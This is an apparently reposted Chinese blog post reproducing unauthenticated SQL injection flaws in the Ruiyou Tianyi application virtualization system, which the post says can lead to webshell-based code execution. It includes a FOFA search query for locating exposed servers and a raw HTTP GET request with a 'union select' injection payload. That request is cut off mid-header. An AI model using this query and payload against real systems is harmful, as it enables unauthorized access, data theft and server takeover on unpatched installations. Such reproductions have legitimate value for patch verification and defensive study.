瑞友天翼应用虚拟化系统 多处SQL 注入漏洞复现(可RCE)

发布时间:2023年12月18日

0x01 产品简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上,客户端通过WEB即可快速安全的访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等,从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞友天翼应用虚拟化系统存在多处SQL注入漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统写入Webshell执行任意代码。

0x03 影响范围

瑞友天翼应用虚拟化系统 <= 7.0.4.1

0x04 复现环境

FOFA:title="瑞友天翼-应用虚拟化系统" || title="瑞友应用虚拟化系统"

0x05 漏洞复现

PoC-1

GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel M
文章来源:https://blog.csdn.net/qq_41904294/article/details/135022781
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。